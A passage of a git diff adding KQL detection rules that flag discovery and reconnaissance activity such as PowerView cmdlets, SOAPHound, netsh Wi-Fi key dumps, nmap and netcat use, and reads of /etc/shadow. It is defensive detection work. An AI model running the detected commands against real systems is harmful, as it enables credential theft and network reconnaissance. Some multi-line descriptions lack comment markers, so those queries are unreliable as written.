ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql new file mode 100644 index 00000000..34ad28ef --- /dev/null +++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql @@ -0,0 +1,11 @@ +// Title: HackTool - SOAPHound Execution +// Author: @kostastsale +// Date: 2024-01-26 +// Level: high +// Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 + +DeviceProcessEvents +| where (ProcessCommandLine contains " --buildcache " or ProcessCommandLine contains " --bhdump " or ProcessCommandLine contains " --certdump " or ProcessCommandLine contains " --dnsdump ") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " --cachefilename " or ProcessCommandLine contains " -o " or ProcessCommandLine contains " --outputdirectory") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql new file mode 100644 index 00000000..8d00d224 --- /dev/null +++ b/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - TruffleSnout Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: high +// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1482 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql new file mode 100644 index 00000000..25d15566 --- /dev/null +++ b/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql @@ -0,0 +1,10 @@ +// Title: Harvesting Of Wifi Credentials Via Netsh.EXE +// Author: Andreas Hunkeler (@Karneades), oscd.community +// Date: 2020-04-20 +// Level: medium +// Description: Detect the harvesting of wifi credentials using netsh.exe +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 + +DeviceProcessEvents +| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql new file mode 100644 index 00000000..0dd0897b --- /dev/null +++ b/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql @@ -0,0 +1,12 @@ +// Title: Linux Network Service Scanning Tools Execution +// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) +// Date: 2020-10-21 +// Level: low +// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap") \ No newline at end of file diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/Discovery/linux_remote_system_discovery.kql new file mode 100644 index 00000000..c993b989 --- /dev/null +++ b/KQL/rules/Discovery/linux_remote_system_discovery.kql @@ -0,0 +1,12 @@ +// Title: Linux Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: low +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/Discovery/local_accounts_discovery.kql new file mode 100644 index 00000000..5eedc70d --- /dev/null +++ b/KQL/rules/Discovery/local_accounts_discovery.kql @@ -0,0 +1,12 @@ +// Title: Local Accounts Discovery +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Local accounts, System Owner/User discovery using operating systems utilities +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, attack.t1087.001 +// False Positives: +// - Legitimate administrator or user enumerates local users for legitimate reason + +DeviceProcessEvents +| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/Discovery/local_groups_discovery_linux.kql new file mode 100644 index 00000000..36d18147 --- /dev/null +++ b/KQL/rules/Discovery/local_groups_discovery_linux.kql @@ -0,0 +1,12 @@ +// Title: Local Groups Discovery - Linux +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-10-11 +// Level: low +// Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/groups" or (ProcessCommandLine contains "/etc/group" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/Discovery/local_groups_discovery_macos.kql new file mode 100644 index 00000000..164d2d7c --- /dev/null +++ b/KQL/rules/Discovery/local_groups_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: Local Groups Discovery - MacOs +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-10-11 +// Level: informational +// Description: Detects enumeration of local system groups +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "group") and FolderPath endswith "/dscacheutil") or (ProcessCommandLine contains "/etc/group" and FolderPath endswith "/cat") or ((ProcessCommandLine contains "-list" and ProcessCommandLine contains "/groups") and FolderPath endswith "/dscl") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..0fb156fc --- /dev/null +++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,14 @@ +// Title: Local Groups Reconnaissance Via Wmic.EXE +// Author: frack113 +// Date: 2021-12-12 +// Level: low +// Description: Detects the execution of "wmic" with the "group" flag. +Adversaries may attempt to find local system groups and permission settings. +The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. +Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 + +DeviceProcessEvents +| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql new file mode 100644 index 00000000..fd3026f9 --- /dev/null +++ b/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql @@ -0,0 +1,12 @@ +// Title: Local System Accounts Discovery - Linux +// Author: Alejandro Ortuno, oscd.community, CheraghiMilad +// Date: 2020-10-08 +// Level: low +// Description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/lastlog" or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/etc/spwd.db" or ProcessCommandLine contains "/etc/pwd.db" or ProcessCommandLine contains "/etc/master.passwd") and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail" or FolderPath endswith "/vi" or FolderPath endswith "/vim" or FolderPath endswith "/less" or FolderPath endswith "/emacs" or FolderPath endswith "/sqlite3" or FolderPath endswith "/makemap")) or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof") \ No newline at end of file diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql new file mode 100644 index 00000000..e2ff4f81 --- /dev/null +++ b/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: Local System Accounts Discovery - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects enumeration of local systeam accounts on MacOS +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "list" and ProcessCommandLine contains "/users") and FolderPath endswith "/dscl") or ((ProcessCommandLine contains "-q" and ProcessCommandLine contains "user") and FolderPath endswith "/dscacheutil") or ProcessCommandLine contains "'x:0:'" or ((ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/sudoers") and FolderPath endswith "/cat") or FolderPath endswith "/id" or (ProcessCommandLine contains "-u" and FolderPath endswith "/lsof") \ No newline at end of file diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/Discovery/macos_network_service_scanning.kql new file mode 100644 index 00000000..24d422e1 --- /dev/null +++ b/KQL/rules/Discovery/macos_network_service_scanning.kql @@ -0,0 +1,12 @@ +// Title: MacOS Network Service Scanning +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-21 +// Level: low +// Description: Detects enumeration of local or remote network services. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((FolderPath endswith "/nc" or FolderPath endswith "/netcat") and (not(ProcessCommandLine contains "l"))) or (FolderPath endswith "/nmap" or FolderPath endswith "/telnet") \ No newline at end of file diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/Discovery/macos_remote_system_discovery.kql new file mode 100644 index 00000000..375cf900 --- /dev/null +++ b/KQL/rules/Discovery/macos_remote_system_discovery.kql @@ -0,0 +1,12 @@ +// Title: Macos Remote System Discovery +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-22 +// Level: informational +// Description: Detects the enumeration of other remote systems. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/Discovery/network_reconnaissance_activity.kql new file mode 100644 index 00000000..109e83da --- /dev/null +++ b/KQL/rules/Discovery/network_reconnaissance_activity.kql @@ -0,0 +1,12 @@ +// Title: Network Reconnaissance Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-07 +// Level: high +// Description: Detects a set of suspicious network related commands often used in recon stages +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs." \ No newline at end of file diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql new file mode 100644 index 00000000..3a12f8a6 --- /dev/null +++ b/KQL/rules/Discovery/network_sniffing_macos.kql @@ -0,0 +1,14 @@ +// Title: Network Sniffing - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-14 +// Level: informational +// Description: Detects the usage of tooling to sniff network traffic. +An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark" \ No newline at end of file diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql new file mode 100644 index 00000000..9903a25e --- /dev/null +++ b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: New Network Trace Capture Started Via Netsh.EXE +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/Discovery/nltest_exe_execution.kql new file mode 100644 index 00000000..30f4ef74 --- /dev/null +++ b/KQL/rules/Discovery/nltest_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: Nltest.EXE Execution +// Author: Arun Chauhan +// Date: 2023-02-03 +// Level: low +// Description: Detects nltest commands that can be used for information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/Discovery/notepad_password_files_discovery.kql new file mode 100644 index 00000000..8d0e8b2b --- /dev/null +++ b/KQL/rules/Discovery/notepad_password_files_discovery.kql @@ -0,0 +1,12 @@ +// Title: Notepad Password Files Discovery +// Author: The DFIR Report +// Date: 2025-02-21 +// Level: low +// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql new file mode 100644 index 00000000..8ab99f01 --- /dev/null +++ b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql @@ -0,0 +1,10 @@ +// Title: Obfuscated IP Download Activity +// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-08-03 +// Level: medium +// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents +| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql new file mode 100644 index 00000000..17246363 --- /dev/null +++ b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql @@ -0,0 +1,10 @@ +// Title: Obfuscated IP Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-08-03 +// Level: medium +// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents +| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql new file mode 100644 index 00000000..49bf1bae --- /dev/null +++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql @@ -0,0 +1,11 @@ +// Title: OS Architecture Discovery Via Grep +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep" \ No newline at end of file diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql new file mode 100644 index 00000000..9d06690e --- /dev/null +++ b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql @@ -0,0 +1,12 @@ +// Title: Permission Check Via Accesschk.EXE +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-13 +// Level: medium +// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents +| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/Discovery/pktmon_exe_execution.kql new file mode 100644 index 00000000..33b2823c --- /dev/null +++ b/KQL/rules/Discovery/pktmon_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: PktMon.EXE Execution +// Author: frack113 +// Date: 2022-03-17 +// Level: medium +// Description: Detects execution of PktMon, a tool that captures network packets. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql new file mode 100644 index 00000000..18f18f6b --- /dev/null +++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql @@ -0,0 +1,12 @@ +// Title: Pnscan Binary Data Transmission Activity +// Author: David Burkett (@signalblur) +// Date: 2024-04-16 +// Level: medium +// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. +This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql new file mode 100644 index 00000000..1e81ff0c --- /dev/null +++ b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: medium +// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012, attack.t1007 +// False Positives: +// - Discord + +DeviceProcessEvents +| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services") \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql new file mode 100644 index 00000000..edd00674 --- /dev/null +++ b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql @@ -0,0 +1,13 @@ +// Title: Potential Container Discovery Via Inodes Listing +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. +// MITRE Tactic: Discovery +// Tags: 